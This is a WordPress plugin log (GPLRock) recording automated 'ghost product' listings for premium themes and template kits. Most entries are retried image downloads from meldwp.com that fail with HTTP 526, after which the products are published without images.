/home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b9169114.jpg [02-Apr-2026 18:56:28 UTC] GPLRock: Using pre-downloaded image for product orifarm-organic-farm-agriculture-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b9169114.jpg [02-Apr-2026 18:56:28 UTC] GPLRock: Ghost product published with image - Product ID: orifarm-organic-farm-agriculture-elementor-template-kit [02-Apr-2026 18:56:29 UTC] GPLRock: Image downloaded successfully for product nursera-home-care-private-nursing-services-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c1c8e1c3.jpg [02-Apr-2026 18:56:30 UTC] GPLRock: Using pre-downloaded image for product nursera-home-care-private-nursing-services-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c1c8e1c3.jpg [02-Apr-2026 18:56:30 UTC] GPLRock: Ghost product published with image - Product ID: nursera-home-care-private-nursing-services-elementor-template-kit [02-Apr-2026 18:56:31 UTC] GPLRock: Image downloaded successfully for product ngoo-non-profit-charity-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c5d5a2e8.webp [02-Apr-2026 18:56:31 UTC] GPLRock: Using pre-downloaded image for product ngoo-non-profit-charity-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c5d5a2e8.webp [02-Apr-2026 18:56:31 UTC] GPLRock: Ghost product published with image - Product ID: ngoo-non-profit-charity-template-kit [02-Apr-2026 18:56:34 UTC] GPLRock: Image downloaded successfully for product newsatlas-news-magazine-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2bb07920.jpg [02-Apr-2026 18:56:34 UTC] GPLRock: Using pre-downloaded image for product newsatlas-news-magazine-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2bb07920.jpg [02-Apr-2026 18:56:34 UTC] GPLRock: Ghost product published with image - Product ID: newsatlas-news-magazine-elementor-template-kit [02-Apr-2026 18:56:36 UTC] GPLRock: Image downloaded successfully for product musicy-music-school-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-055ba982.jpg [02-Apr-2026 18:56:36 UTC] GPLRock: Using pre-downloaded image for product musicy-music-school-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-055ba982.jpg [02-Apr-2026 18:56:36 UTC] GPLRock: Ghost product published with image - Product ID: musicy-music-school-elementor-template-kit [02-Apr-2026 18:56:37 UTC] GPLRock: Image downloaded successfully for product mova-moving-company-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4c7db2b3.webp [02-Apr-2026 18:56:37 UTC] GPLRock: Using pre-downloaded image for product mova-moving-company-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4c7db2b3.webp [02-Apr-2026 18:56:37 UTC] GPLRock: Ghost product published with image - Product ID: mova-moving-company-elementor-template-kit [02-Apr-2026 18:56:39 UTC] GPLRock: Image downloaded successfully for product kold-air-conditioner-hvac-repair-service-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-1f26ba53.jpg [02-Apr-2026 18:56:39 UTC] GPLRock: Using pre-downloaded image for product kold-air-conditioner-hvac-repair-service-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-1f26ba53.jpg [02-Apr-2026 18:56:39 UTC] GPLRock: Ghost product published with image - Product ID: kold-air-conditioner-hvac-repair-service-elementor-template-kit [02-Apr-2026 18:56:41 UTC] GPLRock: Image downloaded successfully for product kidzena-kindergarten-preschool-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5f1e6339.jpg [02-Apr-2026 18:56:41 UTC] GPLRock: Using pre-downloaded image for product kidzena-kindergarten-preschool-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5f1e6339.jpg [02-Apr-2026 18:56:41 UTC] GPLRock: Ghost product published with image - Product ID: kidzena-kindergarten-preschool-elementor-template-kit [02-Apr-2026 18:56:42 UTC] GPLRock: Image downloaded successfully for product icelab-ice-cream-frozen-yogurt-shop-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5b0df931.jpg [02-Apr-2026 18:56:42 UTC] GPLRock: Using pre-downloaded image for product icelab-ice-cream-frozen-yogurt-shop-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5b0df931.jpg [02-Apr-2026 18:56:42 UTC] GPLRock: Ghost product published with image - Product ID: icelab-ice-cream-frozen-yogurt-shop-elementor-template-kit [02-Apr-2026 19:00:06 UTC] GPLRock: Image downloaded successfully for product analytify-pro-campaigns-add-on (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9f94b758.jpg [02-Apr-2026 19:00:06 UTC] GPLRock: Using pre-downloaded image for product analytify-pro-campaigns-add-on: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9f94b758.jpg [02-Apr-2026 19:00:06 UTC] GPLRock: Ghost product published with image - Product ID: analytify-pro-campaigns-add-on [02-Apr-2026 19:00:08 UTC] GPLRock: Image downloaded successfully for product analytify-pro-woocommerce-add-on (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-361a5573.jpg [02-Apr-2026 19:00:08 UTC] GPLRock: Using pre-downloaded image for product analytify-pro-woocommerce-add-on: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-361a5573.jpg [02-Apr-2026 19:00:08 UTC] GPLRock: Ghost product published with image - Product ID: analytify-pro-woocommerce-add-on [02-Apr-2026 19:17:18 UTC] GPLRock: Image download failed for product electro-electronics-ecommerce-html-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:17:18 UTC] GPLRock: Image download failed for product wordpress-pdo-crud-crud-form-builder-plugin-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:17:20 UTC] GPLRock: Image download failed for product electro-electronics-ecommerce-html-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:17:20 UTC] GPLRock: Image download failed for product wordpress-pdo-crud-crud-form-builder-plugin-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:17:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/electro---electronics-ecommerce-html-template-1036.webp for product electro-electronics-ecommerce-html-template after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 19:17:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wordpress-pdo-crud--crud--form-builder-plugin-for-wordpress-33561.webp for product wordpress-pdo-crud-crud-form-builder-plugin-for-wordpress after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 19:17:24 UTC] GPLRock: Image download failed for product wordpress-pdo-crud-crud-form-builder-plugin-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:17:24 UTC] GPLRock: Image download failed for product electro-electronics-ecommerce-html-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:17:26 UTC] GPLRock: Image download failed for product wordpress-pdo-crud-crud-form-builder-plugin-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:17:26 UTC] GPLRock: Image download failed for product electro-electronics-ecommerce-html-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:17:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wordpress-pdo-crud--crud--form-builder-plugin-for-wordpress-33561.webp for product wordpress-pdo-crud-crud-form-builder-plugin-for-wordpress after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 19:17:28 UTC] GPLRock WARNING: Image download failed for product wordpress-pdo-crud-crud-form-builder-plugin-for-wordpress. URL: https://meldwp.com/wp-content/uploads/wordpress-pdo-crud--crud--form-builder-plugin-for-wordpress-33561.webp [02-Apr-2026 19:17:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/electro---electronics-ecommerce-html-template-1036.webp for product electro-electronics-ecommerce-html-template after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 19:17:28 UTC] GPLRock WARNING: Image download failed for product electro-electronics-ecommerce-html-template. URL: https://meldwp.com/wp-content/uploads/electro---electronics-ecommerce-html-template-1036.webp [02-Apr-2026 19:17:28 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wordpress-pdo-crud-crud-form-builder-plugin-for-wordpress [02-Apr-2026 19:17:28 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: electro-electronics-ecommerce-html-template [02-Apr-2026 19:17:28 UTC] GPLRock: Image download failed for product visual-composer-ultimate-magic-popup (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:17:28 UTC] GPLRock: Image download failed for product basho-multipurpose-ghost-blog-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:17:30 UTC] GPLRock: Image download failed for product visual-composer-ultimate-magic-popup (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:17:30 UTC] GPLRock: Image download failed for product basho-multipurpose-ghost-blog-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:17:32 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/visual-composer---ultimate-magic-popup-7642.webp for product visual-composer-ultimate-magic-popup after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 19:17:32 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/basho---multipurpose-ghost-blog-theme-20397.webp for product basho-multipurpose-ghost-blog-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 19:17:32 UTC] GPLRock: Image download failed for product visual-composer-ultimate-magic-popup (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:17:32 UTC] GPLRock: Image download failed for product basho-multipurpose-ghost-blog-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:17:34 UTC] GPLRock: Image download failed for product visual-composer-ultimate-magic-popup (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:17:34 UTC] GPLRock: Image download failed for product basho-multipurpose-ghost-blog-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:17:36 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/visual-composer---ultimate-magic-popup-7642.webp for product visual-composer-ultimate-magic-popup after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 19:17:36 UTC] GPLRock WARNING: Image download failed for product visual-composer-ultimate-magic-popup. URL: https://meldwp.com/wp-content/uploads/visual-composer---ultimate-magic-popup-7642.webp [02-Apr-2026 19:17:36 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/basho---multipurpose-ghost-blog-theme-20397.webp for product basho-multipurpose-ghost-blog-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 19:17:36 UTC] GPLRock WARNING: Image download failed for product basho-multipurpose-ghost-blog-theme. URL: https://meldwp.com/wp-content/uploads/basho---multipurpose-ghost-blog-theme-20397.webp [02-Apr-2026 19:17:36 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: basho-multipurpose-ghost-blog-theme [02-Apr-2026 19:17:36 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: visual-composer-ultimate-magic-popup [02-Apr-2026 19:17:38 UTC] GPLRock: Image download failed for product wp-pro-geo-targeting (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:17:38 UTC] GPLRock: Image download failed for product pendulum-beat-producers-djs-events-theme-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:17:40 UTC] GPLRock: Image download failed for product wp-pro-geo-targeting (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:17:40 UTC] GPLRock: Image download failed for product pendulum-beat-producers-djs-events-theme-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:17:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wp-pro-geo-targeting-16978.webp for product wp-pro-geo-targeting after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 19:17:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/pendulum---beat-producers-djs--events-theme-for-wordpress-12361.webp for product pendulum-beat-producers-djs-events-theme-for-wordpress after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 19:17:42 UTC] GPLRock: Image download failed for product wp-pro-geo-targeting (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:17:42 UTC] GPLRock: Image download failed for product pendulum-beat-producers-djs-events-theme-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:17:44 UTC] GPLRock: Image download failed for product wp-pro-geo-targeting (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:17:44 UTC] GPLRock: Image download failed for product pendulum-beat-producers-djs-events-theme-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:17:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wp-pro-geo-targeting-16978.webp for product wp-pro-geo-targeting after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 19:17:46 UTC] GPLRock WARNING: Image download failed for product wp-pro-geo-targeting. URL: https://meldwp.com/wp-content/uploads/wp-pro-geo-targeting-16978.webp [02-Apr-2026 19:17:46 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wp-pro-geo-targeting [02-Apr-2026 19:17:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/pendulum---beat-producers-djs--events-theme-for-wordpress-12361.webp for product pendulum-beat-producers-djs-events-theme-for-wordpress after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 19:17:46 UTC] GPLRock WARNING: Image download failed for product pendulum-beat-producers-djs-events-theme-for-wordpress. URL: https://meldwp.com/wp-content/uploads/pendulum---beat-producers-djs--events-theme-for-wordpress-12361.webp [02-Apr-2026 19:17:46 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: pendulum-beat-producers-djs-events-theme-for-wordpress [02-Apr-2026 19:17:47 UTC] GPLRock: Image download failed for product android-news-app (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:17:47 UTC] GPLRock: Image download failed for product childhope-child-adoption-services-nonprofit-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:17:49 UTC] GPLRock: Image download failed for product android-news-app (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:17:49 UTC] GPLRock: Image download failed for product childhope-child-adoption-services-nonprofit-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:17:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/android-news-app-26768.webp for product android-news-app after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 19:17:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/childhope--child-adoption-services--nonprofit-theme-4220.webp for product childhope-child-adoption-services-nonprofit-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 19:17:51 UTC] GPLRock: Image download failed for product android-news-app (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:17:51 UTC] GPLRock: Image download failed for product childhope-child-adoption-services-nonprofit-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:17:53 UTC] GPLRock: Image download failed for product android-news-app (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:17:53 UTC] GPLRock: Image download failed for product childhope-child-adoption-services-nonprofit-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:17:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/android-news-app-26768.webp for product android-news-app after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 19:17:55 UTC] GPLRock WARNING: Image download failed for product android-news-app. URL: https://meldwp.com/wp-content/uploads/android-news-app-26768.webp [02-Apr-2026 19:17:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/childhope--child-adoption-services--nonprofit-theme-4220.webp for product childhope-child-adoption-services-nonprofit-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 19:17:55 UTC] GPLRock WARNING: Image download failed for product childhope-child-adoption-services-nonprofit-theme. URL: https://meldwp.com/wp-content/uploads/childhope--child-adoption-services--nonprofit-theme-4220.webp [02-Apr-2026 19:17:57 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: android-news-app [02-Apr-2026 19:17:58 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: childhope-child-adoption-services-nonprofit-theme [02-Apr-2026 19:17:58 UTC] GPLRock: Image download failed for product custom-post-types-taxonomies-and-fields-for-avada-builder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:17:59 UTC] GPLRock: Image download failed for product basil-cooking-classes-and-workshops-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:18:01 UTC] GPLRock: Image download failed for product custom-post-types-taxonomies-and-fields-for-avada-builder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:18:01 UTC] GPLRock: Image download failed for product basil-cooking-classes-and-workshops-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:18:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/custom-post-types-taxonomies-and-fields-for-avada-builder-30071.webp for product custom-post-types-taxonomies-and-fields-for-avada-builder after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 19:18:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/basil--cooking-classes-and-workshops-wordpress-theme-33397.webp for product basil-cooking-classes-and-workshops-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 19:18:03 UTC] GPLRock: Image download failed for product custom-post-types-taxonomies-and-fields-for-avada-builder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:18:03 UTC] GPLRock: Image download failed for product basil-cooking-classes-and-workshops-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:18:05 UTC] GPLRock: Image download failed for product basil-cooking-classes-and-workshops-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:18:05 UTC] GPLRock: Image download failed for product custom-post-types-taxonomies-and-fields-for-avada-builder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:18:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/basil--cooking-classes-and-workshops-wordpress-theme-33397.webp for product basil-cooking-classes-and-workshops-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 19:18:07 UTC] GPLRock WARNING: Image download failed for product basil-cooking-classes-and-workshops-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/basil--cooking-classes-and-workshops-wordpress-theme-33397.webp [02-Apr-2026 19:18:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/custom-post-types-taxonomies-and-fields-for-avada-builder-30071.webp for product custom-post-types-taxonomies-and-fields-for-avada-builder after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 19:18:07 UTC] GPLRock WARNING: Image download failed for product custom-post-types-taxonomies-and-fields-for-avada-builder. URL: https://meldwp.com/wp-content/uploads/custom-post-types-taxonomies-and-fields-for-avada-builder-30071.webp [02-Apr-2026 19:18:07 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: basil-cooking-classes-and-workshops-wordpress-theme [02-Apr-2026 19:18:07 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: custom-post-types-taxonomies-and-fields-for-avada-builder [02-Apr-2026 19:18:07 UTC] GPLRock: Image download failed for product peaker-fitness-gym-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:18:07 UTC] GPLRock: Image download failed for product woocommerce-orders-tracking-sms-paypal-tracking-autopilot (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:18:09 UTC] GPLRock: Image download failed for product peaker-fitness-gym-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:18:09 UTC] GPLRock: Image download failed for product woocommerce-orders-tracking-sms-paypal-tracking-autopilot (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:18:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/peaker---fitness--gym-wordpress-theme-7086.webp for product peaker-fitness-gym-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 19:18:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-orders-tracking---sms---paypal-tracking-autopilot-10963.webp for product woocommerce-orders-tracking-sms-paypal-tracking-autopilot after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 19:18:14 UTC] GPLRock: Image download failed for product peaker-fitness-gym-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:18:14 UTC] GPLRock: Image download failed for product woocommerce-orders-tracking-sms-paypal-tracking-autopilot (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:18:16 UTC] GPLRock: Image download failed for product woocommerce-orders-tracking-sms-paypal-tracking-autopilot (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:18:16 UTC] GPLRock: Image download failed for product peaker-fitness-gym-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:18:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/peaker---fitness--gym-wordpress-theme-7086.webp for product peaker-fitness-gym-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 19:18:18 UTC] GPLRock WARNING: Image download failed for product peaker-fitness-gym-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/peaker---fitness--gym-wordpress-theme-7086.webp [02-Apr-2026 19:18:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-orders-tracking---sms---paypal-tracking-autopilot-10963.webp for product woocommerce-orders-tracking-sms-paypal-tracking-autopilot after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 19:18:18 UTC] GPLRock WARNING: Image download failed for product woocommerce-orders-tracking-sms-paypal-tracking-autopilot. URL: https://meldwp.com/wp-content/uploads/woocommerce-orders-tracking---sms---paypal-tracking-autopilot-10963.webp [02-Apr-2026 19:18:18 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: peaker-fitness-gym-wordpress-theme [02-Apr-2026 19:18:18 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-orders-tracking-sms-paypal-tracking-autopilot [02-Apr-2026 19:18:19 UTC] GPLRock: Image download failed for product bookme-personal-booking-appointment-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:18:19 UTC] GPLRock: Image download failed for product lifest-insurance-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:18:21 UTC] GPLRock: Image download failed for product bookme-personal-booking-appointment-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:18:21 UTC] GPLRock: Image download failed for product lifest-insurance-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:18:23 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bookme---personal-booking-appointment-plugin-2260.webp for product bookme-personal-booking-appointment-plugin after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 19:18:23 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/lifest---insurance-agency-wordpress-theme-32603.webp for product lifest-insurance-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 19:18:23 UTC] GPLRock: Image download failed for product lifest-insurance-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:18:23 UTC] GPLRock: Image download failed for product bookme-personal-booking-appointment-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:18:25 UTC] GPLRock: Image download failed for product lifest-insurance-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:18:25 UTC] GPLRock: Image download failed for product bookme-personal-booking-appointment-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:18:27 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/lifest---insurance-agency-wordpress-theme-32603.webp for product lifest-insurance-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 19:18:27 UTC] GPLRock WARNING: Image download failed for product lifest-insurance-agency-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/lifest---insurance-agency-wordpress-theme-32603.webp [02-Apr-2026 19:18:27 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bookme---personal-booking-appointment-plugin-2260.webp for product bookme-personal-booking-appointment-plugin after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 19:18:27 UTC] GPLRock WARNING: Image download failed for product bookme-personal-booking-appointment-plugin. URL: https://meldwp.com/wp-content/uploads/bookme---personal-booking-appointment-plugin-2260.webp [02-Apr-2026 19:18:28 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: lifest-insurance-agency-wordpress-theme [02-Apr-2026 19:18:28 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: bookme-personal-booking-appointment-plugin [02-Apr-2026 19:18:29 UTC] GPLRock: Image download failed for product wesper-wordpress-theme-for-blogs-magazines (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:18:29 UTC] GPLRock: Image download failed for product vc-icon-finder-wpbakery-page-builder-icon-finder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:18:32 UTC] GPLRock: Image download failed for product wesper-wordpress-theme-for-blogs-magazines (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:18:32 UTC] GPLRock: Image download failed for product vc-icon-finder-wpbakery-page-builder-icon-finder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:18:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wesper---wordpress-theme-for-blogs--magazines-18593.webp for product wesper-wordpress-theme-for-blogs-magazines after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 19:18:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/vc-icon-finder---wpbakery-page-builder-icon-finder-25924.webp for product vc-icon-finder-wpbakery-page-builder-icon-finder after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 19:18:34 UTC] GPLRock: Image download failed for product wesper-wordpress-theme-for-blogs-magazines (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:18:34 UTC] GPLRock: Image download failed for product vc-icon-finder-wpbakery-page-builder-icon-finder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:18:36 UTC] GPLRock: Image download failed for product wesper-wordpress-theme-for-blogs-magazines (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:18:36 UTC] GPLRock: Image download failed for product vc-icon-finder-wpbakery-page-builder-icon-finder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 19:18:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wesper---wordpress-theme-for-blogs--magazines-18593.webp for product wesper-wordpress-theme-for-blogs-magazines after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 19:18:38 UTC] GPLRock WARNING: Image download failed for product wesper-wordpress-theme-for-blogs-magazines. URL: https://meldwp.com/wp-content/uploads/wesper---wordpress-theme-for-blogs--magazines-18593.webp [02-Apr-2026 19:18:38 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wesper-wordpress-theme-for-blogs-magazines [02-Apr-2026 19:18:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/vc-icon-finder---wpbakery-page-builder-icon-finder-25924.webp for product vc-icon-finder-wpbakery-page-builder-icon-finder after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 19:18:38 UTC] GPLRock WARNING: Image download failed for product vc-icon-finder-wpbakery-page-builder-icon-finder. URL: https://meldwp.com/wp-content/uploads/vc-icon-finder---wpbakery-page-builder-icon-finder-25924.webp [02-Apr-2026 19:18:38 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: 